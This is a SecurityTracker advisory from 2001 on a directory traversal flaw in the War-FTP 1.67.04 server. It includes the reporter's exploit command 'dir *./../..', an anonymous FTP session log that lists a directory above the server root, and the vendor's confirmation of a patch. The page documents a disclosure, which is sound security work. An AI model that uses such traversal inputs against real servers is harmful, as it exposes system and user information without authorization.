SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   War-FTP Vendors:   Jgaa (jgaa.com)
Jgaa's War-FTP Server Allows Access to Directories Outside of the Server's Root Directory
SecurityTracker Alert ID:  1001031
SecurityTracker URL:  http://securitytracker.com/id/1001031
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 7 2001
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.67.04, possibly others
Description:   Authorized users (including anonymous users) can remotely obtain unauthorized directory listings for directories outside of the server's root directory.

By adding a special string to the dir command (dir *./../..), an authorized user (including anonymous users, if anonymous access is enabled) can obtain a directory listing for directories outside of the server's root directory.

The vendor has been contacted and a patch is reportedly available.

Impact:   A remote user can obtain a directory listing for the directory above the root directory.
Solution:   A patch is reportedly available at http://support.jgaa.com
Vendor URL:  www.jgaa.com (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Warftp 1.67b04 Directory Traversal


Overview:
by adding a special formed argument to the dir 
command, it is possible to list the /../ directory.

Detail:
the command is the following: dir *./../..

Log:

Verbindung mit 10.17.3.44 wurde hergestellt.
220- Jgaa's Fan Club FTP Service WAR-FTPD 1.67-
04 Ready
220 Please enter your user name.
Benutzer (10.17.3.44:(none)): anonymous
331 User name okay. Give your full Email address as 
password.
Kennwort:
230 User logged in, proceed.
ftp> dir
200 Port command okay.
150 Opening ASCII NO-PRINT mode data connection 
for ls -l.
total 123
drwxrwxrwx 1 ftp ftp 0 Mar 2 12:17 test
-rwxrwxrwx 1 ftp ftp 6 Mar 2 12:33 movedtohomedir.txt
-rwxrwxrwx 1 ftp ftp 11 Mar 2 00:29 bisontest.txt
drwxrwxrwx 1 ftp ftp 0 Mar 3 15:59 HTTP
drwxrwxrwx 1 ftp ftp 0 Mar 3 17:05 huhu
drwxrwxrwx 1 ftp ftp 0 Mar 5 13:42 te
drwxrwxrwx 1 ftp ftp 0 Mar 5 13:42 ..te
226 Transfer finished successfully. Data connection 
closed.
FTP: 452 Bytes empfangen in 0,02Sekunden 
22,60KB/s
ftp> cd ..
550 Permission denied.
ftp> dir *./../..
200 Port command okay.
150 Opening ASCII NO-PRINT mode data connection 
for ls *./../...
total 123
-rwxrwxrwx 1 ftp ftp 251658240 Mar 4 18:42 
WIN386.SWP
drwxrwxrwx 1 ftp ftp 0 Jan 6 20:32 games
drwxrwxrwx 1 ftp ftp 0 Jan 7 19:58 HalfLife
....(cut here)
...
drwxrwxrwx 1 ftp ftp 0 Jan 15 22:36 delphi_zips
drwxrwxrwx 1 ftp ftp 0 Mar 4 15:00 web
drwxrwxrwx 1 ftp ftp 0 Mar 4 21:36 WEBS
226 Transfer finished successfully. Data connection 
closed.
FTP: 2977 Bytes empfangen in 0,07Sekunden 
42,53KB/s

the author has been contacted.
response: (slightly edited by se0020)

I can confirm that the problem is present in War FTP 
Daemon 1.67.04. 
After examining the problem, it _looks_ like the exploit 
is limited to listing the content one level up from the 
root-directory. I was unable to access any of the 
listed files or directories. I do however consider the 
problem as serious, and wil release a fix within a few 
hours.

the patch has been already released:
http://support.jgaa.com 

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC